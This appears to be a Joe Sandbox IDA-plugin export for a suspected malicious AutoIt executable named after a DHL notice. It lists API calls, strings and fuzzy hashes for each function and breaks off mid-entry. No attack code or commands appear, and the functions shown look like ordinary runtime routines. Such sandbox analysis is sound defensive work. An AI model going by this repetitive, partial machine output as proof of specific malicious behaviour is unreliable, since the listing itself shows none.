Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 1d80595bd30c3c24395bb61cf55619b5871efb47fa3bc6847332264fea9bd199
Instruction ID: 64888165e32bc2f050894fbf068bedc4ec9221b864d319483a28f5c631f9c875
Opcode Fuzzy Hash: 1d80595bd30c3c24395bb61cf55619b5871efb47fa3bc6847332264fea9bd199
Instruction Fuzzy Hash: F63138B4E1030A9FDB14DFA9C981BDABBB9FF59300F5040AAE904AB341D770A951CF90

Function 002331EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0023327C
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00233287

Strings

Combobox, xrefs: 00233249

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 5ff997331d28ac886688c7f996de1ee7dead792fd06bd73227fa119678988a03
Instruction ID: 807f6fb7cb1ae7a927cebec230b8950a5efa76527baea2924913848bf55b844d
Opcode Fuzzy Hash: 5ff997331d28ac886688c7f996de1ee7dead792fd06bd73227fa119678988a03
Instruction Fuzzy Hash: 8711B2B13202097FFF25DE54DC85EBB376AEB94364F104228F9189B290D6719E718B60

Function 00233710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 001A600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 001A604C
Part of subcall function 001A600E: GetStockObject.GDI32(00000011), ref: 001A6060
Part of subcall function 001A600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 001A606A

GetWindowRect.USER32(00000000,?), ref: 0023377A
GetSysColor.USER32(00000012), ref: 00233794

Strings

static, xrefs: 00233757

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 7b50135d18279086594535a3e0d22aa6ebf7a9b07c85080dd945e1d2750efd54
Instruction ID: e8e651532ede15b6ef5a6f9fd98d0492bc63405daebcf37b47dc237d711e8b06
Opcode Fuzzy Hash: 7b50135d18279086594535a3e0d22aa6ebf7a9b07c85080dd945e1d2750efd54
Instruction Fuzzy Hash: EA113AB262020AAFDF00DFA8DC46EFA7BB8FF09314F104514F955E2250D775E9619B50

Function 0021CD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0021CD7D
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0021CDA6

Strings

<local>, xrefs: 0021CD66

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 419964214cca7cc8eb0d44180b33283ba7450acfd807e380b24efec326753819
Instruction ID: 0a1f0be4c2d6efaf88c2e6b8f511582b39f59573db82ce67ca891c4ad424f5ae
Opcode Fuzzy Hash: 419964214cca7cc8eb0d44180b33283ba7450acfd807e380b24efec326753819
Instruction Fuzzy Hash: 8111CA7516563279D7384F66AC49FE7BEECEF227A4F204235B50993080D7709890D6F0

Function 00233429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 002334AB
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 002334BA

Strings

edit, xrefs: 0023348F

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: f5707817ccaa30c72e2426d0990cfdc1980fc05bd5d984abb88edfc2efb5d5f5
Instruction ID: 9d6f025a3bb4cc097cb52cdb551887db22510e3a2d4382fd55bd926b8fdde32b
Opcode Fuzzy Hash: f5707817ccaa30c72e2426d0990cfdc1980fc05bd5d984abb88edfc2efb5d5f5
Instruction Fuzzy Hash: F71191B1120209AFEB118F64EC44AFB376AEF15374F604324FA65A71E0C771DEA19B50

Function 00206C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 001A9CB3: _wcslen.LIBCMT ref: 001A9CBD

CharUpperBuffW.USER32(?,?,?), ref: 00206CB6
_wcslen.LIBCMT ref: 00206CC2

Strings

STOP, xrefs: 00206CBC, 00206CC1

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: STOP
API String ID: 1256254125-2411985666
Opcode ID: 8155c000be7bc40b7705ffc1c6dd2fa5431edaea183cffe7d0700077df093ecc
Instruction ID: 2e3ce15223835c5be5c5db297210d0eeb5c9fe175b16fd30df9a227d769e9ab1
Opcode Fuzzy Hash: 8155c000be7bc40b7705ffc1c6dd2fa5431edaea183cffe7d0700077df093ecc
Instruction Fuzzy Hash: 510104326206278BDB209FFDDC889BF33A4EA617107100529E852961D2EB31D870C650

Function 00201CDE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 001A9CB3: _wcslen.LIBCMT ref: 001A9CBD

Part of subcall function 00203CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00203CCA

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00201D4C

Strings

ListBox, xrefs: 00201D16
ComboBox, xrefs: 00201CEB

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 21fef93d1f29e4b90c03cb31dd42be833766bf1a55993cf271289e79860002af
Instruction ID: f91b6fc2f7550856c47bfb4c5ec676d2533603855cf9eec8e55990b443eae72a
Opcode Fuzzy Hash: 21fef93d1f29e4b90c03cb31dd42be833766bf1a55993cf271289e79860002af
Instruction Fuzzy Hash: F001D875621329ABCB08EFA4CC55CFE7368FF57350B14051AF822672C2EB3059688760

Function 00201BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 001A9CB3: _wcslen.LIBCMT ref: 001A9CBD

Part of subcall function 00203CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00203CCA

SendMessageW.USER32(?,00000180,00000000,?), ref: 00201C46

Strings

ListBox, xrefs: 00201C10
ComboBox, xrefs: 00201BE5

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: c4150c1af721725465aec94248da7b69316cd06c307e2dab313a3cd501bd56fc
Instruction ID: 8e89773cd7d317824a281c3243ccdc425dda57fb63e459c295689bfe0d586615
Opcode Fuzzy Hash: c4150c1af721725465aec94248da7b69316cd06c307e2dab313a3cd501bd56fc
Instruction Fuzzy Hash: CC01A7756A121967DB08EB90D9529FF77AC9F22340F14001AF406772C2EA64DEB896B2

Function 00201C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 001A9CB3: _wcslen.LIBCMT ref: 001A9CBD

Part of subcall function 00203CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00203CCA

SendMessageW.USER32(?,00000182,?,00000000), ref: 00201CC8

Strings

ListBox, xrefs: 00201C94
ComboBox, xrefs: 00201C69

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 9110c3794641a2b593b9df72c90b2cf2f63beb94258e6ceccb29eaeda5679add
Instruction ID: 50a91dd1b3b45f13681fa6655aa8e3ad4cd60b728dccacba857aab9c1dd3a7e8
Opcode Fuzzy Hash: 9110c3794641a2b593b9df72c90b2cf2f63beb94258e6ceccb29eaeda5679add
Instruction Fuzzy Hash: FB01DB7565021967DB04EB90CA11AFE73AC9B22340F140016B801772C2EA60DF78D672

Function 00201D68 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON

Download Yara Rule

APIs

Part of subcall function 001A9CB3: _wcslen.LIBCMT ref: 001A9CBD

Part of subcall function 00203CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00203CCA

SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00201DD3

Strings

ListBox, xrefs: 00201DA0
ComboBox, xrefs: 00201D75

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 51bf18270d64056dfe835a7f96a8929313a233f6aac6359643a2a1a9f39324bd
Instruction ID: b09294dd544ad7a27f52881e23eb290d6a15e8c19c9e3f9599877dad433f9f12
Opcode Fuzzy Hash: 51bf18270d64056dfe835a7f96a8929313a233f6aac6359643a2a1a9f39324bd
Instruction Fuzzy Hash: 3AF0F475A6072966DB08EBA4CC52AFE737CAB13354F040915F822A72C2DB6059288660

Function 00238172 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00273018,0027305C), ref: 002381BF
CloseHandle.KERNEL32 ref: 002381D1

Strings

\0', xrefs: 0023818A

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: \0'
API String ID: 3712363035-3769339230
Opcode ID: a9f4d4bbd627eeb484d93694e15f1b4318dca10dcdc2016d0c3cd68cc2a7b34e
Instruction ID: d91c9898265e96a89bdd38d729ad7b9ddb4f2966ea00217951a19b56aa6eb650
Opcode Fuzzy Hash: a9f4d4bbd627eeb484d93694e15f1b4318dca10dcdc2016d0c3cd68cc2a7b34e
Instruction Fuzzy Hash: C8F05EB2650310BBE320AB61BC49FB73A5CEB19750F004465FB0CE51A2D6798A50A3B9

Function 0022747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00227493
_wcslen.LIBCMT ref: 002274B9

Strings

3, 3, 16, 1, xrefs: 00227483

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: _wcslen
String ID: 3, 3, 16, 1
API String ID: 176396367-3042988571
Opcode ID: 2439d12f9c9ab53729e26bd9081cc94c477b7e2c3c6b676de7f19d616e912a1f
Instruction ID: cfe944c3541b4ce902293f1c64e3f187dac53fd55388b427ab9ebe28aa3530c5
Opcode Fuzzy Hash: 2439d12f9c9ab53729e26bd9081cc94c477b7e2c3c6b676de7f19d616e912a1f
Instruction Fuzzy Hash: 7CE02B0662C23171923136B9BCC1EBF5699DFEA754710182FF981C2266EBA4CDB1D3A0

Function 00200B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00200B23

Strings

AutoIt, xrefs: 00200B17
Error allocating memory., xrefs: 00200B1C

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Message
String ID: AutoIt$Error allocating memory.
API String ID: 2030045667-4017498283
Opcode ID: 5f62113f6319d5d6428299057afe8f1dab8f6eb4b488fd143194cfca0b94e934
Instruction ID: 0cbe9ffec44b0db75050cf8171562f78fc7f8daad0e2ade2ba5b7efaad928895
Opcode Fuzzy Hash: 5f62113f6319d5d6428299057afe8f1dab8f6eb4b488fd143194cfca0b94e934
Instruction Fuzzy Hash: 01E0D83125431826D21037947C03FD97B848F16B21F20042AFB58654C38BD1A4A007E9

Function 001C0D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 001BF7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,001C0D71,?,?,?,001A100A), ref: 001BF7CE

IsDebuggerPresent.KERNEL32(?,?,?,001A100A), ref: 001C0D75
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,001A100A), ref: 001C0D84

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 001C0D7F

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: 8a7255c974c4c33af36c3a2768772f265cf44f6b232d79d523d7895211d5d7d6
Instruction ID: 2d1181e1ca2e79b9a14f88844e4729407172d76559a13a35dfbd13a22303b0a6
Opcode Fuzzy Hash: 8a7255c974c4c33af36c3a2768772f265cf44f6b232d79d523d7895211d5d7d6
Instruction Fuzzy Hash: BBE092B42003518BD3719FBCF9087527BE0AF28740F00496DE887D6651DBB4E4448B91

Function 001BE398 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 001BE3D5

Strings

8%', xrefs: 001BE3CA
0%', xrefs: 001BE3B5

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Init_thread_footer
String ID: 0%'$8%'
API String ID: 1385522511-1499395184
Opcode ID: 61291ae20cf9a714aa371d4bf0a1c9a0fdc40ede354b8d6a430bfa36b7305f0a
Instruction ID: aac34d0abd49a777448d2187bef8bf9712b5d6a59b19c7b17d96ec7e81bd71d4
Opcode Fuzzy Hash: 61291ae20cf9a714aa371d4bf0a1c9a0fdc40ede354b8d6a430bfa36b7305f0a
Instruction Fuzzy Hash: 36E08631414910CBCA0D9728BA59ECC33D5FB29328B915169E11A871E39B35A8858755

Function 00213017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000001), ref: 0021302F
GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00213044

Strings

aut, xrefs: 00213038

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: afe3590a80f85913c2ec292f253b0850c1b5e17a97d80fd6257902e22da2bc00
Instruction ID: ba8b9d313e0cee64a3b5bc57dbc0e3464b80e0cda9e1cb5ed75ab9af93f07fbe
Opcode Fuzzy Hash: afe3590a80f85913c2ec292f253b0850c1b5e17a97d80fd6257902e22da2bc00
Instruction Fuzzy Hash: 7DD05E7260032867DA20A7A4AC0EFCB3A6CDB05750F0002A1BA55E2091DAB09984CBD0

Function 001FD21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 001FD220

Strings

X64, xrefs: 001FD2A8
%.3d, xrefs: 001FD22B

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: LocalTime
String ID: %.3d$X64
API String ID: 481472006-1077770165
Opcode ID: 110b4c5ee548f302a830e91b498a003ceb7aed1f72770c778e1a67e5790ca36a
Instruction ID: 39176ba3a5c55f20c2b8ba93186dc9737781cba3c03130b2c2d3a4c4bc7dc611
Opcode Fuzzy Hash: 110b4c5ee548f302a830e91b498a003ceb7aed1f72770c778e1a67e5790ca36a
Instruction Fuzzy Hash: A5D0126180810CE9CB5897D0FC498FAB37DAB19341F618452FE06A1040E724C55867A2

Function 00232322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0023232C
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0023233F

Part of subcall function 0020E97B: Sleep.KERNEL32 ref: 0020E9F3

Strings

Shell_TrayWnd, xrefs: 00232325

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 69ec5e318845cec10c58382595a8f5cb9c9564511b6869a6e872b0989501f84f
Instruction ID: 5ffecf551b43f46cc33f006bfeeaa7339334202544e5b7edcd8108e8d3781b21
Opcode Fuzzy Hash: 69ec5e318845cec10c58382595a8f5cb9c9564511b6869a6e872b0989501f84f
Instruction Fuzzy Hash: EAD0C9763A4310B6E668A770AC4FFC6BA189B41B10F1149167645BA1D1C9A0A8518B54

Function 00232356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0023236C
PostMessageW.USER32(00000000), ref: 00232373

Part of subcall function 0020E97B: Sleep.KERNEL32 ref: 0020E9F3

Strings

Shell_TrayWnd, xrefs: 00232365

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
